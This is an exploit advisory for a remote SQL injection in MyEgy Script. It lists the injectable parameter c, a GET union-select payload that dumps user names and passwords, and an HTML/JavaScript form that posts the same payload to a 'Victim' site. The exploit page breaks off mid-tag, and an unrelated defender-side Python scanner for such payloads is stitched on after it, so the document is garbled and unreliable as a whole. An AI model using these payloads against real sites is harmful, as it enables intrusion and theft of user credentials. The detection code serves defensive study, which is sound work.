
MyEgy Script SQL Injection

Posted Jun 30, 2009
Authored by Karar alShaMi, Sheko

MyEgy Script suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 344a20a85a52a308d091f3c0bf9281361d30a96cb16daed4ba3ee34709bde521

<html>
<!--
Script Name :MyEgy Script
Author : Karar alShaMi & Sheko (El3akrab Elmodamer)
Email :   K4rar@yahoo.com ,  ahmed_sheko998@yahoo.com
Demo : http://www.7obonlin.com
Exploit : Write the site in (Victim) field then submit the form :)
AdminCp : /?do=login
Note : each color of myegy script have a different columns number so try to change the (Columns number) field
to 6 or 7 or 9 if the exploit failed with 8 :)
Note 2 : We Can Use Get Method To Exploit This Vulnerability
See line 64 $cat = $_REQUEST['c'];
So we Can Exploit it in this way
http://localhost/myegy/?c=[Sql]
[Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users--
//-->
<head><title>MyEgy Explo!t</title>
<style type="text/css">
.style1 {
 text-align: center;
}
</style>
</head>
<body>
<script language="Javascript">
function doit(si,co){
 for(var n =1;n<co;n++){
 if(tmp){
 var tmp = tmp+n+",";
  }else{
 var tmp = n+",";
 }
  }
tmp =tmp.replace(5,"concat(name,0x3a,password)");
document.f0.action=si+'/';
document.f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--';
document.f0.submit;
}
</script>
<form name="f0" method="post">
<p class="style1">My Egy Explo!t</p>
<p class="style1">By : Karar alShaMi & Sheko</p>
<p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="
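
A defender-side check for the injection point the advisory names (`c`, read through `$_REQUEST`, so it arrives by GET or POST). This is an added example, not part of the original advisory or of MyEgy Script: it scans request records for `c` values that are not plain integers or that contain `union select` once `/**/` separators are stripped. The request tuples are constructed samples, and treating a legitimate `c` as a non-negative integer category id is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample requests (method, URL, form body); not taken from real logs.
SAMPLE_REQUESTS = [
    ("GET", "/myegy/?c=12", ""),
    ("GET", "/myegy/?c=-1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users--", ""),
    ("POST", "/myegy/", "site=x&c=-1%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2C3+from+users--"),
    ("GET", "/myegy/?do=login", ""),
]

SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)


def c_values(method, url, body):
    """Yield every value of parameter 'c' from the query string and a form body.

    $_REQUEST merges GET and POST, so both places have to be inspected."""
    yield from parse_qs(urlsplit(url).query, keep_blank_values=True).get("c", [])
    if method == "POST":
        yield from parse_qs(body, keep_blank_values=True).get("c", [])


def classify(value):
    """Return 'ok', 'non-numeric' or 'union-select' for one decoded value of c."""
    # parse_qs has already decoded '+' and %xx; replace inline comments with a
    # space so '/**/' separators cannot hide the keywords from the pattern.
    normalised = SQL_COMMENT.sub(" ", value).strip()
    if UNION_SELECT.search(normalised):
        return "union-select"
    # Assumption: a legitimate c is a non-negative integer category id.
    return "ok" if re.fullmatch(r"[0-9]+", normalised) else "non-numeric"


def scan(requests):
    """Return (method, url, verdict) for every request whose c is not 'ok'."""
    hits = []
    for method, url, body in requests:
        for value in c_values(method, url, body):
            verdict = classify(value)
            if verdict != "ok":
                hits.append((method, url, verdict))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit)
```

The same integer-only rule, enforced in the application before the value reaches the query, closes the hole; the scan only shows which requests would have violated it.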

